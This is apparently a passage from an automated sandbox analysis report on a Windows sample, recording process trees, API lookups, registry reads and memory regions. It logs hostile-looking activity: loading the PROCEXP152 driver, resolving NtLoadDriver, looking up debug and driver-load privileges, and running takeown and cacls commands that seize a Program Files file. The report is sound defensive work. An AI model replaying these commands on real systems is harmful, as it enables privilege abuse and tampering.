| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffaf7a895e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffaf7aa3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffaf70f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffaf7112720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffaf4f0e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffaf71128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffaf70e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffaf7112a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffaf70f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffaf7112bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffaf70f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffaf7112cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffaf70e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffaf4ea45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffaf70e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffaf70ee960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtLoadDriver, address_out = 0x7ffaf7aa4490 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ffaf7a2f0d0 |
|
2 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ffaf7aa36d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ffaf7aa3790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ffaf7aa38a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ffaf7aa4980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ffaf7aa47f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ffaf7aa46c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ffaf7aa3ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ffaf7aa3640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ffaf7aa3a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ffaf7a75d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ffaf7a336a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ffaf7a37110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ffaf7a37110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ffaf7a33dc0 |
|
1 |
Driver (278)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | \??\C:\Windows\system32\Drivers\PROCEXP152.SYS | - |
|
1 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
186 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
8 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
19 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
7 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
48 |
User (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Lookup Privilege | privilege = SeLoadDriverPrivilege, luid = 10 |
|
1 |
System (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
5 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #28: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:40, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xea8 |
| Parent PID | 0xa40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7E8
0x
930
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000730000 | 0x00730000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x00751fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x00773fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00803fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x00821fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x0095ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f050000 | 0x7f050000 | 0x7f072fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f07b000 | 0x7f07b000 | 0x7f07dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f07e000 | 0x7f07e000 | 0x7f07efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f07f000 | 0x7f07f000 | 0x7f07ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #29: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:40, Reason: Child Process |
| Unmonitor | End Time: 00:03:42, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb48 |
| Parent PID | 0xa40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
5B8
0x
7F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x0469ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x046bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046c1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000046d0000 | 0x046d0000 | 0x046e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000046f0000 | 0x046f0000 | 0x0472ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004730000 | 0x04730000 | 0x0476ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004770000 | 0x04770000 | 0x04773fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004780000 | 0x04780000 | 0x04780fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004790000 | 0x04790000 | 0x04791fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047f0000 | 0x047f0000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004950000 | 0x04950000 | 0x04a4ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea00000 | 0x7ea00000 | 0x7ea22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea25000 | 0x7ea25000 | 0x7ea25fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea2c000 | 0x7ea2c000 | 0x7ea2efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea2f000 | 0x7ea2f000 | 0x7ea2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #30: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "jnwdui.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:41, Reason: Child Process |
| Unmonitor | End Time: 00:04:27, Reason: Self Terminated |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x190 |
| Parent PID | 0x578 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
ED0
0x
EC0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000540000 | 0x00540000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0054ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00553fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00561fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00563fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00583fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x006d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x006e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00870000 | 0x0092dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x00a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c00000 | 0x00c00000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00c10000 | 0x00f46fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fb20000 | 0x7fb20000 | 0x7fc1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fc20000 | 0x7fc20000 | 0x7fc42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fc46000 | 0x7fc46000 | 0x7fc48fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc49000 | 0x7fc49000 | 0x7fc4bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc4c000 | 0x7fc4c000 | 0x7fc4cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc4f000 | 0x7fc4f000 | 0x7fc4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xed4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #31: System
0
0
| Information | Value |
|---|---|
| ID | #31 |
| File Name | System |
| Command Line | - |
| Initial Working Directory | - |
| Monitor | Start Time: 00:03:41, Reason: Created Daemon |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:20 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
2C
0x
13C
0x
F68
0x
F34
0x
F30
0x
DAC
0x
EB8
0x
EAC
0x
28
0x
138
0x
DC8
0x
DA8
0x
DA4
0x
DA0
0x
D9C
0x
D98
0x
D94
0x
D90
0x
D8C
0x
D88
0x
D84
0x
D80
0x
D7C
0x
D78
0x
D74
0x
D70
0x
D6C
0x
D68
0x
D64
0x
D60
0x
D5C
0x
D58
0x
D54
0x
D50
0x
D4C
0x
D48
0x
D44
0x
D40
0x
D3C
0x
D38
0x
D34
0x
D30
0x
D2C
0x
D28
0x
D24
0x
D20
0x
D1C
0x
D10
0x
D04
0x
CEC
0x
CD0
0x
C98
0x
CA4
0x
1C
0x
C80
0x
C70
0x
C5C
0x
D0
0x
CC
0x
914
0x
E8
0x
7F0
0x
84
0x
80
0x
30
0x
B34
0x
85C
0x
8B8
0x
BE0
0x
884
0x
BE8
0x
510
0x
850
0x
860
0x
4CC
0x
B44
0x
2D0
0x
BF4
0x
A18
0x
A0C
0x
9AC
0x
9A0
0x
10
0x
8C4
0x
8BC
0x
38
0x
858
0x
6C
0x
730
0x
C8
0x
670
0x
66C
0x
660
0x
654
0x
C4
0x
5C8
0x
560
0x
48
0x
518
0x
178
0x
50C
0x
4B4
0x
474
0x
460
0x
8C
0x
1E0
0x
70
0x
33C
0x
74
0x
B0
0x
144
0x
78
0x
174
0x
2C4
0x
84
0x
44
0x
148
0x
14
0x
B8
0x
104
0x
1B0
0x
20
0x
3C
0x
17C
0x
170
0x
16C
0x
164
0x
E4
0x
140
0x
7C
0x
34
0x
F0
0x
A4
0x
B4
0x
A8
0x
128
0x
124
0x
C0
0x
60
0x
88
0x
110
0x
BC
0x
EC
0x
64
0x
8
0x
0
0x
A10
0x
5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000000280000000 | 0x280000000 | 0x280000fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000280010000 | 0x280010000 | 0x280010fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000280020000 | 0x280020000 | 0x280020fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000280030000 | 0x280030000 | 0x28004ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280050000 | 0x280050000 | 0x28006ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280070000 | 0x280070000 | 0x28008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280090000 | 0x280090000 | 0x2800affff | Private Memory | rw |
|
|
|
- |
| private_0x00000002800b0000 | 0x2800b0000 | 0x2800cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000002800d0000 | 0x2800d0000 | 0x2800effff | Private Memory | rw |
|
|
|
- |
| private_0x00000002800f0000 | 0x2800f0000 | 0x28010ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280110000 | 0x280110000 | 0x28012ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280130000 | 0x280130000 | 0x28014ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280150000 | 0x280150000 | 0x28016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280170000 | 0x280170000 | 0x28018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280190000 | 0x280190000 | 0x2801affff | Private Memory | rw |
|
|
|
- |
| private_0x00000002801b0000 | 0x2801b0000 | 0x2801cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000002801d0000 | 0x2801d0000 | 0x2801effff | Private Memory | rw |
|
|
|
- |
| private_0x00000002801f0000 | 0x2801f0000 | 0x28020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280210000 | 0x280210000 | 0x28022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280230000 | 0x280230000 | 0x28024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280250000 | 0x280250000 | 0x28026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280270000 | 0x280270000 | 0x28028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280290000 | 0x280290000 | 0x2802affff | Private Memory | rw |
|
|
|
- |
| private_0x00000002802b0000 | 0x2802b0000 | 0x2802cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000002802d0000 | 0x2802d0000 | 0x2802effff | Private Memory | rw |
|
|
|
- |
| private_0x00000002802f0000 | 0x2802f0000 | 0x28030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280310000 | 0x280310000 | 0x28032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280330000 | 0x280330000 | 0x28034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280350000 | 0x280350000 | 0x28036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280370000 | 0x280370000 | 0x28038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000280390000 | 0x280390000 | 0x2803affff | Private Memory | rw |
|
|
|
- |
| private_0x00000002803b0000 | 0x2803b0000 | 0x2803cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000002803d0000 | 0x2803d0000 | 0x2803effff | Private Memory | rw |
|
|
|
- |
| private_0x00000002803f0000 | 0x2803f0000 | 0x28040ffff | Private Memory | rw |
|
|
|
- |
